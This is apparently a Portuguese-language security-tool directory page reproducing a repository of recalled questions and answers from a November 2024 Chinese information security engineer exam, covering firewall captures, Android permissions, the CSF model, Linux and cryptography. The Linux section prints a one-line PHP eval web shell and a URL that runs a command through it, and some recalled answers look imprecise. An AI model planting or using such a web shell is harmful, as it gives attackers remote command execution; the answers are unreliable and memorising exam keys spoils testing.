Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
2024InformationSecurityEngineer — 2024年信息安全工程师、2024InformationSecurityEngineer | Kitploit
Ferramentas/GitHubGitHub/jas502n/2024informationsecurityengineer
Segurança AndroidFerramentas de Criptografia/DescriptografiaSegurança de RedeAprendizado e EducaçãoRecursos CuradosTrilhas e CursosLabs e Prática
GitHubjas502n/2024informationsecurityengineer

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

2024InformationSecurityEngineer

2024年信息安全工程师、2024InformationSecurityEngineer

Ver Repositório
112há 1 anoAinda não revisado

2024InformationSecurityEngineer

2024 Engenheiro de Segurança da Informação, 2024InformationSecurityEngineer

Engenheiro de Segurança da Informação - Segundo Semestre de 2024

Relembrando questões de exemplo

Exame de Qualificação de Software - Data do exame : 2024年11月08日

1. Captura de pacotes no firewall (14 pontos)

  1. Comprimento do pacote___ (2 pontos) Resposta: 63
  2. Máquina real ou máquina virtual___ (2 pontos) Resposta: máquina virtual
  3. IP e porta do host de controle___ (2 pontos) Resposta: 192.168.1.218 14444
  4. Regra de filtro do Wireshark para IP e porta___ (2 pontos) Resposta: ip.addr == 192.168.2.105 and tcp.dstport == 14444
  5. Comando usado pelo host de controle (2 pontos) Resposta: ipconfig
  6. Atalho do Windows para visualizar o firewall___ (2 pontos) Resposta: firewall.cpl
  7. Qual opção___ (2 pontos) Resposta: personalizado

2. Questão Android (16 pontos)

  1. Diretório/arquivo onde a assinatura é armazenada___ (2 pontos) Resposta: META-INF

  2. Diretório/arquivo onde as permissões são armazenadas___ (2 pontos) Resposta: AndroidManifest.xml

  3. Questão 5 (10 pontos) (1) Qual configuração suporta backup; (2) Pode ler informações históricas de localização; há algum risco de segurança; (3) No arquivo de configuração, quais dos quatro componentes foram usados; (4) Qual componente tem maior risco de vazamento de informações; (5) Existe abuso de informações? Explique em detalhes;

    Resposta: (1) backup...... não suporta backup (2) Existe risco; informações desconhecidas têm risco de vazamento (3) Activity, BroadcastRecevier (4) Contentprovider (5) Existe abuso de informações; permissões de localização, câmera, armazenamento, contatos, multimídia, Bluetooth etc. Muitas são coletadas em excesso.

  4. O usuário no Android tem privilégios root? (2 pontos) Resposta: não

3. CSF (11 pontos)

  1. Qual modelo de segurança___ (2 pontos) Resposta: PDRR
  2. Desconhecido
  3. O firewall é qual função principal___ (2 pontos) Resposta: proteção
  4. Questão 2 (4 pontos) (1) Qual função principal o CSF tem a mais que o PDRR___ (2 pontos) Resposta: identificação (2) A avaliação de risco pertence a qual função no CSF___ (2 pontos) Resposta: identificação
  5. Além da identificação de ativos, quais são as outras três identificações___ (3 pontos) Resposta: identificação de riscos; identificação de vulnerabilidades; identificação de medidas de segurança existentes

4. Linux (13 pontos)

  1. O nome completo de "ll"___ (2 pontos) Resposta: ls -l

  2. Atualmente é root ou usuário comum___ (2 pontos) Resposta: root

  3. Representação numérica das permissões de arquivo___ (2 pontos) Resposta: rw-r--r-- 644

  4. O que significa "../" na figura___ (2 pontos) Resposta: diretório pai, /var/www/html

  5. Comando nativo do Linux para calcular hash___ (2 pontos) md5sum; sha1sum; shasum -a 256

  6. shell.php <?php @eval($_GET["cmd"]); ?> (5 pontos)

  1. Qual é a senha de conexão correspondente a este arquivo Resposta: cmd
  2. Qual método de requisição http Resposta: GET
  3. Supondo que o domínio seja abc.com, a URL completa da requisição para executar whoami Resposta: abc.com/shell.php?cmd=system("whoami")

5. Criptografia (15 pontos)

  1. Além de simétrica e assimétrica, de acordo com a forma de processamento do texto claro, como mais pode ser criptografado? (2 pontos) Resposta: criptografia em bloco e criptografia de fluxo
  2. Os 8 bits de "a" (2 pontos) Resposta: 97 ---》 01100001
  3. Resultado da criptografia XOR de "a" com "abc" (6 pontos) Resposta: 032 ou 00000000 00000011 00000010
  4. Dados mi, ki, ci, qual é a fórmula para obter o texto claro? (2 pontos) Resposta: mi = ki XOR ^ ci
  5. Dois textos claros diferentes criptografados com a mesma chave da cifra de fluxo são seguros? Por quê? (2 pontos) Resposta: Não é seguro; é possível derivar um texto claro a partir do outro
  6. A cifra de bloco pode usar cifra de fluxo? (1 ponto) Resposta: pode
Baixar ferramenta